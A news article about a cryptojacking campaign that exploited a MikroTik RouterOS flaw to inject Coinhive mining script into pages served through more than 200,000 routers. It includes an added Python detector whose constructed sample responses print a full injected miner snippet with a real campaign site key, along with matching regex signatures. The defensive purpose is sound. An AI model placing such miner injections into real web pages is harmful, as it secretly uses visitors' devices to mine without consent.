A cryptojacking campaign has infected more than 200,000 MikroTik routers that were still unpatched four months after the vendor released a fix for the underlying vulnerability.
The flaw, tracked as CVE-2018-14847, was exploited by criminal crypto miners to inject the Coinhive mining script into web pages visited by users behind the affected routers. The attackers initially infected thousands of routers in Brazil, as reported by SpiderLabs, Trustwave's security research team.
Our researcher @Simon_Kenin has discovered a massive #IoT #cryptojacking campaign affecting tens of thousands of unpatched @mikrotik_com routers in Brazil and going global. Read more here: https://t.co/SfIz7KKcnc
— SpiderLabs (@SpiderLabs) August 1, 2018
The vulnerability, in the Winbox management service of MikroTik routers, allowed attackers to bypass authentication and quickly gain full administrative control of the device. It was disclosed in April 2018, and MikroTik released a patched RouterOS version at that time.
It all started in Brazil
The researchers found the Coinhive script first on about 175,000 routers located in Brazil. A second Coinhive site key was then found on a further 25,000 routers, this time in the Republic of Moldova, according to researcher Troy Mursch of Bad Packets Report.
Coinhive site key "oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4" is used in another #cryptojacking campaign targeting MikroTik routers. In this case, over 25,000 affected hosts are found on @censysio
— Bad Packets Report (@bad_packets) August 2, 2018
Initially the script was injected into every web page that users visited through an infected router. To avoid detection, the attacker later restricted the injection to error pages only. The attacker also removed traces of the intrusion from compromised routers.
The campaign mainly targets MikroTik routers located in Brazil. A large share of those devices were evidently never updated after the fix was released four months ago, so they remain at serious risk of being compromised again.
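As an added illustration (not code from SpiderLabs, Bad Packets Report or the original article), the following Python script shows the kind of check a network operator could run over HTTP responses fetched through a suspect router: it flags response bodies that load the Coinhive library or construct a CoinHive miner, extracts the site key, compares it with the key quoted above, and notes whether the injection landed on an error page, which is the behaviour described for the later stage of this campaign. The sample responses are constructed; the patterns target the original coinhive.com loader and the CoinHive.Anonymous/User constructor, so a renamed copy of the library would need extra patterns.

```python
"""Detect Coinhive-style browser mining injected into HTTP responses.

Added example (not from the article or the researchers it quotes).
Feed it (url, status, body) triples captured with a proxy or fetched
through the router under test; the SAMPLE_RESPONSES below are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Site key attributed to the second campaign in the Bad Packets Report tweet above.
KNOWN_SITE_KEYS = {"oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4"}

# <script src="https://coinhive.com/lib/coinhive.min.js"> (scheme optional)
LOADER_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//coinhive\.com/lib/coinhive\.min\.js',
    re.IGNORECASE,
)
# new CoinHive.Anonymous("<32-char site key>", ...) or CoinHive.User(...)
MINER_RE = re.compile(
    r'new\s+CoinHive\.(?:Anonymous|User)\s*\(\s*["\']([A-Za-z0-9]{32})["\']'
)


@dataclass
class Finding:
    url: str
    status: int
    site_key: Optional[str]   # None if only the loader was seen
    known_key: bool           # key matches one attributed to this campaign
    error_page: bool          # injected into a 4xx/5xx response


def scan_response(url: str, status: int, body: str) -> Optional[Finding]:
    """Return a Finding if the body carries the Coinhive loader or miner code."""
    loader_present = LOADER_RE.search(body) is not None
    miner = MINER_RE.search(body)
    if not loader_present and miner is None:
        return None
    key = miner.group(1) if miner else None
    return Finding(
        url=url,
        status=status,
        site_key=key,
        known_key=key in KNOWN_SITE_KEYS,
        error_page=status >= 400,
    )


def scan_responses(responses: List[Tuple[str, int, str]]) -> List[Finding]:
    """Scan a batch of (url, status, body) triples and collect findings."""
    findings = []
    for url, status, body in responses:
        finding = scan_response(url, status, body)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample traffic: one clean page, one injected 404 error page
# carrying the known key, a page that merely mentions Coinhive in prose,
# and a 200 page injected with an unattributed key.
SAMPLE_RESPONSES = [
    ("http://example.test/", 200,
     "<html><body><h1>Welcome</h1></body></html>"),
    ("http://example.test/missing", 404,
     '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
     '<script>var miner = new CoinHive.Anonymous("oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4", '
     '{throttle: 0.5}); miner.start();</script></head>'
     '<body>404 Not Found</body></html>'),
    ("http://example.test/news", 200,
     "<html><body><p>Coinhive is a browser-based miner.</p></body></html>"),
    ("http://example.test/page", 200,
     '<script src="//coinhive.com/lib/coinhive.min.js"></script>'
     '<script>new CoinHive.Anonymous("' + "A" * 32 + '").start();</script>'),
]

if __name__ == "__main__":
    for f in scan_responses(SAMPLE_RESPONSES):
        print(f)
```

Any hit on a page the upstream site does not serve itself, and especially a hit on an error page, is a strong sign that a device in the path is rewriting traffic; the site key is worth recording, since it is what ties separate infections to the same operator.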
“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” said Simon Kenin, a security researcher at SpiderLabs.